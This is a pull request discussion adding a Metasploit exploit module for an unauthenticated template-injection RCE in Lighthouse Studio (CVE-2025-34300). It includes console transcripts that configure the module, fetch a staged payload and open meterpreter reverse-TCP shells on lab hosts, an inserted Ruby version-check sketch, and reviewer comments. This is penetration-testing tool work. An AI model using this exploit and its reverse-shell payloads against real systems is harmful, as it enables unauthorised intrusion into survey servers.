Add Lighthouse Studio unauthenticated RCE (CVE-2025-34300) #20397

Open: wants to merge 18 commits into base: master

Conversation

@vognik (Contributor) commented Jul 20, 2025

Vulnerability Details

This module exploits a template injection vulnerability in the
Sawtooth Software Lighthouse Studio's ciwweb.pl web application.
The application fails to properly sanitize user input within survey templates,
allowing unauthenticated attackers to inject and execute arbitrary Perl commands
on the target system.

This vulnerability affects Lighthouse Studio versions prior to 9.16.14.
Successful exploitation may result in remote code execution under the privileges
of the web server, potentially exposing sensitive data or disrupting survey operations.

An attacker can execute arbitrary system commands as the web server.

Module Information

Module path: exploit/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300
Platform: Linux/Unix/Windows
Tested on: Ubuntu 18.04 / Windows 10
Requirements: Nothing

References

Original Research
https://slcyber.io/assetnote-security-research-center/rce-in-the-most-popular-survey-software-youve-never-heard-of/

Test Output

msf6 > use exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > show options

Module options (exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300):

   Name       Current Setting     Required  Description
   ----       ---------------     --------  -----------
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80                  yes       The target port (TCP)
   SSL        false               no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   STUDYNAME                      no        Value for the hid_studyname GET parameter
   TARGETURI  /cgi-bin/ciwweb.pl  yes       Path to vulnerable ciwweb.pl
   URIPATH                        no        The URI to use for this exploit (default is random)
   VHOST                          no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux Dropper



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > set RHOSTS 192.168.19.129
RHOSTS => 192.168.19.129
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > set STUDYNAME 123
STUDYNAME => 123
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > set LHOST eth0
LHOST => 192.168.19.130
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > set SRVPORT 9999
SRVPORT => 9999
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > run

[*] Started reverse TCP handler on 192.168.19.130:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Extracting version...
[*] Extracted version: 9.16.12
[+] The target appears to be vulnerable.
[*] Uploading malicious payload...
[*] Command Stager progress -  44.31% done (362/817 bytes)
[*] Uploading malicious payload...
[*] Sending stage (3045380 bytes) to 192.168.19.129
[*] Meterpreter session 1 opened (192.168.19.130:4444 -> 192.168.19.129:39790) at 2025-07-20 07:04:31 -0400
[*] Command Stager progress -  97.31% done (795/817 bytes)
[*] Uploading malicious payload...
[*] Command Stager progress - 100.00% done (817/817 bytes)

meterpreter > sysinfo
Computer     : 192.168.19.129
OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
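An added example, not the module's code and not posted by @vognik: the version-gating logic that the AutoCheck output above implies (pull a version string out of the ciwweb.pl response, then compare it against the 9.16.14 fix release named in the PR description, returning the equivalent of CheckCode Appears / Safe / Unknown). The response format, the extraction regex and the sample bodies are assumptions constructed for the example; the module's real regex is not shown on this page.

```ruby
# Added example (not the Metasploit module's code). Reproduces the
# "extract version, compare against fixed release" check shown in the
# AutoCheck output. Assumptions: the version appears in the response as
# "Version 9.16.12" (the real page format is not shown here); the fixed
# version 9.16.14 is taken from the PR description.

# First release that is not affected, per the PR description.
FIXED_VERSION = Gem::Version.new('9.16.14')

# Pull an x.y.z version out of a response body. Returns nil when absent.
# The "Version <x.y.z>" pattern is an assumed format, not the module's regex.
def extract_version(body)
  m = body.match(/\bVersion[^\d]{0,10}(\d+\.\d+\.\d+)/i)
  m && m[1]
end

# Map a version string to :vulnerable, :safe or :unknown, mirroring the
# CheckCode::Appears / CheckCode::Safe / CheckCode::Unknown semantics.
# Unparseable or missing versions are reported as unknown rather than
# silently treated as vulnerable, so the module does not fire blind.
def check_version(version_string)
  return :unknown if version_string.nil?
  v = Gem::Version.new(version_string)
  v < FIXED_VERSION ? :vulnerable : :safe
rescue ArgumentError
  :unknown
end

# Constructed sample bodies (not captured from a real Lighthouse Studio host).
SAMPLE_VULNERABLE = '<html><body>Lighthouse Studio Version 9.16.12</body></html>'
SAMPLE_PATCHED    = '<html><body>Lighthouse Studio Version 9.16.14</body></html>'
SAMPLE_NO_VERSION = '<html><body>404 Not Found</body></html>'

if __FILE__ == $0
  [SAMPLE_VULNERABLE, SAMPLE_PATCHED, SAMPLE_NO_VERSION].each do |body|
    ver = extract_version(body)
    puts "#{ver.inspect} -> #{check_version(ver)}"
  end
end
```

Gem::Version does proper segment-wise comparison, so 9.16.2 is correctly ordered before 9.16.14 (a plain string compare would get that wrong), and a body with no recognisable version yields :unknown instead of a false "appears vulnerable".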

@jheysel-r7 (Contributor) left a comment

Thanks for the module @vognik. A couple comments.

Testing

msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > set rhosts 172.16.199.132
rhosts => 172.16.199.132
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > set studyname test
studyname => test
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > set writabledir /tmp
writabledir => /tmp
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Extracting version...
[*] Extracted version: 9.16.12
[+] The target appears to be vulnerable.
[*] Uploading malicious payload...
[*] Sending stage (3045380 bytes) to 172.16.199.132
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.132:36724) at 2025-07-23 10:39:29 -0700

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 172.16.199.132
OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@vognik (Contributor, Author) commented Jul 24, 2025

@bwatters-r7, @jheysel-r7 Thanks for the code review and valuable advice!

The cmd/windows/http/x64/meterpreter/reverse_tcp payload worked only when I added cmd.exe /c, but the problem persists that, for some unknown reason, it does not resolve environment variables (like %TEMP%, which is the default).

That's why I had files with %TEMP% in the file name saved in cgi-bin (and in general, the payload ran every other time).
[image attachment]

[image attachment]

So I still left the override of the default temporary directory (with an absolute path); this works quite well.
